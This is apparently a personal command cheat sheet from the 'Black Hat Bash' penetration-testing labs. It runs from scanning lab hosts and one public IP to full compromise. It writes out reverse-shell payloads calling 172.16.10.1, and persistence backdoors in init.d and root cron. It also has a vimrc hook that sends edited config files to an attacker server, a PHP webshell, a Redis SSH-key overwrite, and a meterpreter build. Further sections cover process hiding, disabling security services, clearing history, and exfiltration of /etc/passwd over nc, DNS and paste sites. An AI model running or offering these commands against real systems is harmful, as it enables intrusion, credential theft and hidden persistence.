
# Rustscan

rustscan -g -a 172.16.10.0/24 -r 1-1024 | awk -F'->' '{print $1,$2}'
rustscan -a 172.16.10.0/24 -r 1-65535 -b 1000 --ulimit 5000
rustscan -a 172.16.10.0/24 -r 20-22 -b 1000 --ulimit 5000
rustscan -a 172.16.10.10 -r 1-65535 -b 1000 --ulimit 5000 -g
rustscan -a 46.219.66.140 -b 1000 --ulimit 5000 -g

# Nmap

nmap scanme.nmap.org --open
nmap 46.219.66.140 --open
nmap -sV --script=banner.nse 172.16.10.11
nmap -sV --script=banner.nse 172.16.10.11 | grep "|_banner\||_http-server"
nmap --script=ssh-auth-methods 172.16.10.13
nmap --script="ftp*" 172.16.10.11
nmap --script="ftp-anon.nse" 172.16.10.11
ls -al /usr/share/nmap/scripts | grep ftp


# whatweb

whatweb 172.16.10.11:8081 --log-json=/dev/stdout --quiet 2> /dev/null | jq '.[0].plugins.HTTPServer.string[0]'

# netcat

nc -v 172.16.10.11 -w 1 80 2> /dev/null
nc 172.16.10.11 -v 21

# Nikto

echo n | nikto -h 172.16.10.10 -p 8081
echo n | nikto -h 172.16.10.11 -p 80
echo n | nikto -h 172.16.10.12 -p 80

# dirsearch

dirsearch -u http://172.16.10.10:8081/
dirsearch -u http://172.16.10.11
dirsearch -u http://172.16.10.11/backup/acme-hyper-branding/
dirsearch -u http://172.16.10.11/backup/acme-impact-alliance/
dirsearch -u http://46.219.66.140

# gitjacker

gitjacker http://172.16.10.11/backup/acme-impact-alliance/ -o data/172.16.10.11/acme-impact-alliance
cd data/172.16.10.11/acme-impact-alliance
gitjacker http://172.16.10.11/backup/acme-hyper-branding/ -o data/172.16.10.11/acme-hyper-branding
cd data/172.16.10.11/acme-hyper-branding
ls -la data/172.16.10.11/acme-impact-alliance
git log --pretty=format:"%an %ae"
git log | grep Author | grep -oP '(?<=Author: ).*' | sort -u | tr -d '<>'

# Nuclei
curl http://172.16.10.11/backup/acme-hyper-branding/.git/HEAD
ls -la  ~/.local/nuclei-templates/http/osint/phishing
cat ~/.local/nuclei-templates/http/osint/phishing/zoom-phish.yaml

nuclei -u 172.16.10.11 -t ~/.local/nuclei-templates/custom/git-finder.yaml
nuclei -tags apache,git -u 172.16.10.11
nuclei -tags apache,git -u 172.16.10.11 -j | jq
nuclei -u "172.16.10.11:21" -tags "ftp" -silent -nc | tr -d '[]'

nuclei -u 172.16.10.10:8081 > "playground/nuclei-scan-results/172-16-10-10:8081.txt"
nuclei -u 172.16.10.11:80 > "playground/nuclei-scan-results/172-16-10-11.txt"
nuclei -u 172.16.10.12:80 > "playground/nuclei-scan-results/172-16-10-12.txt"
nuclei -u 46.219.66.140

ftp ftp://anonymous:@172.16.10.11
ftp ftp://ftp_admin:@46.219.66.140
bash ch05/nuclei-notifier.sh 172.16.10.10:8081 172.16.10.11:80 172.16.10.12:80
echo -e acme-hyper-branding-{0..100}.{txt,csv,pdf,jpg}"\n" | sed 's/ //g' > "files_wordlist.txt"; head files_wordlist.txt
wget <URL>

# Malicious Polyglot Files
printf '\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00\x43\x00...' > polyglot.jpg
cat app.py >> polyglot.jpg

# Webshell

curl -s "http://172.16.10.10:8081/webshell/$(urlencode "ls")"
curl -s "http://172.16.10.10:8081/webshell/$(urlencode "cd ..")"
curl -s "http://172.16.10.10:8081/webshell/$(urlencode "cd ..; ls")"
bash playground/exercises/run_webshell_opt.sh 172.16.10.10:8081

# Reverse Shells

Set up listener
nc -l -p 1337 -vv
nc -lvp 1234
pwncat-cs -l -p 1337
pwncat-cs -l -p 1337 --ssl (requires Ncat installed on victims machine)
socat - tcp-listen:34459,fork
socat file:$(tty),raw,echo=0 tcp-listen:1337

Craft Payload
|bash -c 'bash -i >& /dev/tcp/172.16.10.1/1337 0>&1'
python3 -c 'import pty; pty.spawn("/bin/bash")'
|socat exec:'bash -li',pty,stderr tcp:172.16.10.1:1337
nc 172.16.10.1 1234 -e /bin/bash & (setup reverse shell via nc by uploading its binaries to the victims machine)

bash ch07/port-hopper.sh
nohup ./donation-monitor.sh > /dev/null 2>&1 &
nohup ./donation-monitor.sh &> /dev/null & (nohup makes process ignore SIGHUP signal -- unstoppable process)

# SSH Brute Force
ssh user@172.16.10.13
ssh backup@172.16.10.13
sshpass -p "my_password" ssh -o "StrictHostKeyChecking=no" \
               -p 22 "username@172.16.10.13" exit &> /dev/null; echo "Command exit code: $?"

# Local Information Gathering

cat /etc/passwd
awk -F':' '{print $1, $6, $7}' /etc/passwd | sed 's/ /, /g'

cat /etc/group
ls -l /home/

grep -e "#DSHELL" /etc/adduser.conf
grep -e "#SHELL" /etc/default/useradd
awk -F':' '{if ($7 == "/bin/sh" || $7 == "/bin/bash") {print $1,$7}}' /etc/passwd
grep -e "/bin/sh" -e "/bin/bash" /etc/passwd

ls -1 /proc/ | grep -E "^[0-9]+$"
ls -1 /proc/1
cat /proc/1/cmdline

ps aux
ps x -o user -o pid -o cmd
hostname
cat /etc/os-release
uname -o
uname -a
uname -r

w
who
last
head /var/run/utmp
head /var/log/wtmp
utmpdump /var/run/utmp
utmpdump /var/log/wtmp
history
find / -name ".*_history" -type f
find / -name ".*_history" -type f 2> /dev/null

# Detecting Network Interfaces

ls -l /sys/class/net/
ls -l /sys/devices/virtual/net
cat /proc/net/route

010A10AC is a gateway IP address in hexadecimal format
echo $((16#01))
echo $((16#0A))
echo $((16#10))
echo $((16#AC))

cat /proc/net/fib_trie
awk '/32 host/ { print f } {f=$2}' /proc/net/fib_trie | sort | uniq
ifconfig
ifconfig -a
ip addr

cat /proc/net/tcp
awk '{print $2,$3}' /proc/net/tcp | tail -n +2
netstat -atnup
nc -v 172.16.10.10 8081

iptables -L --line-numbers -v

# Domain Resolvers
cat /etc/resolv.conf
cat /etc/hosts
head /etc/resolv.conf
curl -s http://p-web-02.acme-infinity-servers.com > can be run from within 172.16.10.12

# Software Installations

apt list --installed
dpkg -l

# Storage

ls -la /mnt/log_storage
lsblk
cat /proc/partitions
cat /proc/mounts
mount
mount | grep /dev
df -h -T
cat /etc/fstab

# Logs

find / -name "*.log" -o -name "*.txt" -o -name "*.out" -type f 2> /dev/null

# Kernel

rpm -qa | grep kernel
ls -l /boot | grep "vmlinuz-"

# Configuration Files

find /etc /usr \
    -name "*.conf" \
    -o -name "*.cf" \
    -o -name "*.ini" \
    -o -name "*.cfg" \
    -o -name "*.cfg" \
    -type f 2> /dev/null
find / -name "*config*" -type f 2> /dev/null
find / -name "*config*" -type f 2> /dev/null | grep sql

# Schedule Jobs

crontab -e   >>>> add new job
crontab -l   >>>> see list of jobs
head /etc/cron.allow
head /etc/cron.deny

touch "$HOME/atfiletemp" | at now + 2 minute
atq

# Hardware

lshw
lshw -C disk
dmidecode
hwinfo

sudo apt install -y virt-what
sudo virt-what

systemd-detect-virt

dmesg
dmesg | grep "Detected virt"

ls -l /sys/class/dmi/id
cat /sys/class/dmi/id/product_name
cat /sys/class/dmi/id/sys_vendor
cat /sys/class/dmi/id/board_vendor
cat /sys/class/dmi/id/bios_vendor
cat /sys/class/dmi/id/product_version

cat /sys/hypervisor/type
sudo cat /proc/1/environ
cat /run/systemd/container

./home/kali/tools/LinEnum.sh -t -r "/tmp/linenum_report.txt"
linenum -t -r "/tmp/linenum_report.txt"
linenum -t -k "root"

# Privilege Escalation

ls -l /etc/passwd
touch my_new_file.sh
chown kali:kali my_new_file.sh
chmod u+rwx,g+r,o+r my_new_file.sh

# File Access Control List
sudo groupadd sysadmins
sudo useradd eve -G sysadmins
sudo useradd alice -G sysadmins
sudo useradd bob -G sysadmins

touch facl_example.txt
getfacl facl_example.txt
setfacl -m g:sysadmins:r-- facl_example.txt
setfacl -m u:eve:--- facl_example.txt

# SetUID and SetGID
ls -l /usr/bin/at
ls -l /usr/bin/passwd
ls -ld /tmp

mkdir /tmp/test
chmod +t /tmp/test
ls -ld /tmp/test

find / -perm -o=r
find / -perm -o=w
find / -perm -o=rwx 2> /dev/null

find / -perm -4000 2> /dev/null  SetUID
find / -perm -2000 2> /dev/null  SetGUID
find / -perm -1000 2> /dev/null  Stricky Bit

stat /usr/bin/elinks
ls -ld /usr/bin/elinks
elinks https://google.com -dump 1
elinks file:///etc/shadow -dump 1

find . -type f -exec grep -i password {} \;

nuclei -tags token,file,github -u 172.16.10.13  Current machine/local search

# Public/Private Keys

gpg --list-keys
touch private_pgp_key.pgp
gpg --output "private_pgp_key.pgp" --armor --export-secret-key arodriguez@acme-infinity-servers.com

# Crack Password from /etc/shadow
john ch09/password-cracking/hashes.txt --format=crypt --wordlist=ch09/password-cracking/wordlist.txt
john ch09/password-cracking/hashes.txt --format=crypt
john --show ch09/password-cracking/hashes.txt

# sudo configuration

sudo -l
ls -ld /etc/sudoers
cat /etc/sudoers
ls -ld /etc/sudoers.d
cat /etc/sudoers.d/kali-grant-root

# check my groups membership
groups

sudo vi /etc/demo.txt
cat /etc/passwd
sudo vi /etc/passwd

sudo vi   Press SHIFT-: (together) > enter !bash > logged in as root user

passwd
su - backup
su - root

python -m http.server 8080 &
sudo curl -s http://172.16.10.1:8080/ch09/add-sudo-to-user -o /etc/sudoers.d/add-sudo-to-user
sudo curl -s http://172.16.10.1:8080/LAB-PLAYGROUND/assets/nc -o /var/www/nc

# Kernal Exploits

uname -r -v
searchsploit linux kernel | grep -i "dirty cow"

grep "/bin/bash" /etc/passwd | grep -v "backup"
sudo curl http://172.16.10.1:8080/local_account_bf.sh -o $(pwd)/local_account_bf.sh
sudo curl http://172.16.10.1:8080/passwords.txt -o $(pwd)/passwords.txt

unix-privesc-check standard
unix-privesc-check detailed

# Persistence

ncat 172.16.10.1 4444 -e /bin/bash 2> /dev/null &  this is added to /etc/init.d/ssh file as malicious code
pwncat-cs -l -p 4444
service ssh start

ls -l /etc/pam.d
tail -n 20 /etc/pam.d/common-session

# Rogue SSH Keys

ssh-keygen -t rsa -C ""
mkdir ~/.ssh && chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
ssh-copy-id -i ~/.ssh/id_rsa.pub backup@172.16.10.13
ssh backup@172.16.10.13 -i ~/.ssh/id_rsa

# Repurposing Default System Accounts

grep lp /etc/passwd
usermod -s /bin/bash lp
passwd lp

# Bash Env Poisoning

cat /etc/bash.bashrc
cat /etc/profile

touch .profile
source .profile
use of 'trap' built-in mechanism to run malicious bash right before command execution

# Credential Theft / VIM

cat ~/.vimrc

autocmd BufWritePost *.conf,*.config :silent !timeout 3 curl -m 5 -s http://172.16.10.1:8080 -o /dev/null --data-binary @<afile> &
echo 'autocmd BufWritePost *.conf,*.config :silent !timeout 3 curl -m 5 -s http://172.16.10.1:8080 -o /dev/null --data-binary @<afile> &' > .vimrc

nc -lkvp 8080

# Streaming Executed Commands

touch /etc/profile.d/99-stream.sh
socat TCP4-LISTEN:4444,fork STDOUT

# Distributing Malicious Package

dpkg --info example_amd64.deb
strings example_amd64.deb
sudo dpkg -i example_amd64.deb
ar -v -x example_amd64.deb

tar -xvf control.tar.xz
tar -xvf data.tar.xz

dpkg -b example-deb example_deb_x64.deb
stat example_deb_x64.deb
dpkg --info example_deb_x64.deb
sudo dpkg -i example_deb_x64.deb
sudo dpkg -r example-deb

sudo alien -v -r example_deb_x64.deb --scripts

dpkg -b bksh bksh_x64.deb
sudo dpkg -i bksh_x64.deb
sudo dpkg -r bksh

sudo cat /var/spool/cron/crontabs/root
echo "* * * * * root nc 172.16.10.1 4444 -e /bin/bash" | crontab - -u root
cat /etc/crontab

sudo crontab -u root -l
crontab -u backup -l

# Probing Corporate Network

cat /etc/services | tail
cat /etc/services | grep ssh
bash ./ch11/port_scan_etc_services.sh 172.16.10.1
bash ./ch11/port_scan_etc_services.sh 10.1.0.13 10.1.0.14

nc -i 1 10.1.0.13 -v 22
nc -i 1 10.1.0.13 -v 8080
nc -v 10.1.0.13 8080
timeout 5 nc -v 10.1.0.14 6379
echo -e '\nINFO' | nc -v 10.1.0.13 22
echo -e '\nINFO' | nc -v 10.1.0.13 8080
echo -e '\nINFO' | nc -v 10.1.0.14 6379

cat /usr/share/nmap/nmap-services | tail
grep -w -e 22/tcp -e 23/tcp -e 3306/tcp -e 1433/tcp /usr/share/nmap/nmap-services
grep "tcp" /usr/share/nmap/nmap-services | sort -r -k 3 | awk '{print $1, $2, $3}' | head

# Shared Volumes

df -hTP | grep /mnt/scripts
mount | grep /mnt/scripts

watch -d 'ls -l'

curl http://172.16.10.1:8080/playground/nc -o $(pwd)/nc
python -m http.server 8080 &

# Exploiting Database Server

nc -v 10.1.0.16 3306
ssh -v -N -L 3306:10.1.0.16:3306 backup@172.16.10.13
netstat -atunp | grep 3306

medusa -h 127.0.0.1 \
    -u root \
    -P /usr/share/metasploit-framework/data/wordlists/unix_users.txt \
    -M mysql

mysql -h 127.0.0.1 -u root -p
mysql -h 127.0.0.1 -u root -p --skip-ssl

# Compromising Redis Server

ssh -v -N -L 6379:10.1.0.14:6379 backup@172.16.10.13
netstat -atunp | grep 6379
redis-cli -h 127.0.0.1 -p 6379

CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET k1 "\n\nssh-rsa AAAAB3Nz...= kali@kali\n\n" # this is public key id_rsa.pub

ssh -v -N -L 2222:10.1.0.14:22 backup@172.16.10.13
netstat -atunp | grep 2222
ssh root@127.0.0.1 -p 2222 -i /home/kali/.ssh/id_rsa

# Metasploit

msfconsole
use auxiliary/scanner/redis/file_upload
show options
set LocalFile "/home/kali/.ssh/id_rsa.pub"
set RemoteFile "/root/.ssh/authorized_keys"
set RHOST 127.0.0.1

# Exposed Database Files

ssh -v -N -L 8888:10.1.0.15:80 backup@172.16.10.13
netstat -atunp | grep 8888
dirsearch -u http://localhost:8888
http://localhost:8888/adminer.php
http://localhost:8888/database.sql
http://localhost:8888/uploads
curl http://localhost:8888/database.sql -o database.sql

select * from acme_hyper_branding
select * from acme_impact _alliance

SELECT "test_write1" into OUTFILE "file_write1.txt"
SELECT "test_write2" into OUTFILE "/var/www/html/file_write2.txt"
SELECT "test_write3" into OUTFILE "/var/www/html/uploads/file_write3.txt"
http://localhost:8888/uploads/file_write3.txt

SELECT "<?php system($_GET['cmd']); ?>" into OUTFILE "/var/www/html/uploads/s.php"
http://localhost:8888/uploads/s.php?cmd=id

# Defense Evasion And Exfiltration

https://secure.eicar.org/eicar.com.txt
bash ch12/exercise_solution.sh

lsmod
dpkg --list

# Concealing Malicious Processes

# Library Preloading

### Generate RSP
echo $LD_PRELOAD
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.10.1 LPORT=2222 -f elf-so > meterpreter.so
file meterpreter.so
scp -O meterpreter.so backup@172.16.10.13:/tmp

### Set up RSP listener via msfconsole (aka Metasploit)
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 172.16.10.1
set LPORT 2222
run

### Run RSP (did not work)
LD_PRELOAD=/tmp/meterpreter.so ssh
LD_LIBRARY_PATH=/tmp/meterpreter.so ssh

# Process Hiding

git clone https://github.com/gianlucaborello/libprocesshider.git
# Update 'processhider.c' file by replacing 'evil_process.py' string with process name to exclude (e.g. cron, sshd)
make
scp -O /home/kali/tools/libprocesshider/libprocesshider.so backup@172.16.10.13:/tmp
# Needs root access
echo "/tmp/libprocesshider.so" >> "/etc/ld.so.preload"

# Process Masquerading (and self-destruction)

ps aux | grep -o '\[.*]'
ps aux | grep -o '\[.*]' | head -8

gcc ch12/system_sleep.c -o ch12/system_sleep
scp -O /home/kali/Projects/Black-Hat-Bash/ch12/binary_name_rotation.sh backup@172.16.10.13:/tmp
bash binary_name_rotation.sh
ps aux

# Dropping Files in Shared Memory

stat /dev/shm
mount | grep "/dev/shm"
grep "/dev/shm" "/proc/self/mountinfo"
mount -o remount ... # lets remount already mounted filesystem changing it behavior (exec binaries vs noexec) - requires root privileges

# Disable Runtime Security Controls

service --status-all
service [servicename] stop
service atd stop

systemctl list-units --type=service
systemctl stop [servicename] # stop service
systemctl disable [servicename] # prevent service to re-run on boot
systemctl stop cron
systemctl disable atd

chkconfig atd off

# Force kill processes
for pid in $(ps -ef | grep -e "iptables" -e "cron" | awk '{print $2}'); do kill -9 "${pid}"; done

## Manipulate History

history | tail -5
history -c # clears history
history -w # writes history to historyfile ($HISTFILE)
history -c && history -w

# Disable history tracking (add to '.bashrc' file)
export HISTZIE=0 && export HISTFILE=/dev/null

# Concealing Data

echo "Secret Data" | base64
echo "Secret Data" | base64 | base64 -d
echo "Secret Data" | xxd -p
echo "Secret Data" | xxd -p | xxd -r -p
# Encode data multiple times (recursively) + use Hexadecimal format via xxd
echo "Secret Data" | base64 | xxd -p | xxd -r -p | base64 -d

# Encryption
MY_SECRET="Black Hat Bash"
echo "${MY_SECRET}" | openssl enc -aes256 -pbkdf2 -base64
echo "U2FsdGVkX1/5Zrp6SQzzmFs9eaAgBIfDKtxG7XXsQgY=" | openssl aes-256-cbc -d -pbkdf2 -base64

# Exfiltration

socat TCP-LISTEN:12345,reuseaddr,fork - | xxd -p -r
xxd -p /etc/passwd | nc 172.16.10.1 12345

sudo dnschef \
    --fakedomains blackhatbash.com \
    --fakeip 127.0.0.1 --interface 0.0.0.0 \
    --logfile dnschef.log
for i in $(xxd -p -c 30 /etc/passwd); do dig $i.blackhatbash.com @172.16.10.1; done
echo "6e2f737368643a2f7573722f7362696e2f6e6f6c6f67696e0a" | xxd -r -p

Text Storage Sites
springe, pastebin.com, dpaste

echo "Black Hat Bash" | curl -s -F "content=<-" https://dpaste.com/api/v2/
curl https://dpaste.com/7KEC48UBX.txt

Sharding Files
for line in $(seq 1 1000); do echo "line number ${line}"; done >> 1000_line_file.txt
split -l 500 -d --verbose 1000_line_file.txt
wc -l x00 x01 1000_line_file.txt
split -d --verbose --bytes=5000 1000_line_file.txt
split -d --verbose --number=10 1000_line_file.txt
ls -l x*

socat TCP-LISTEN:12345,reuseaddr,fork -

---
cd /tmp
for file in $(split -d --verbose -l 5 "/etc/passwd"); do
  for prefix in $(echo ${file} | awk '{print $NF}' | grep -o '[0-9]*'); do
    echo "cat /tmp/x${prefix} | nc 172.16.10.1 12345" | at now "+${prefix}minutes"
  done
done
---
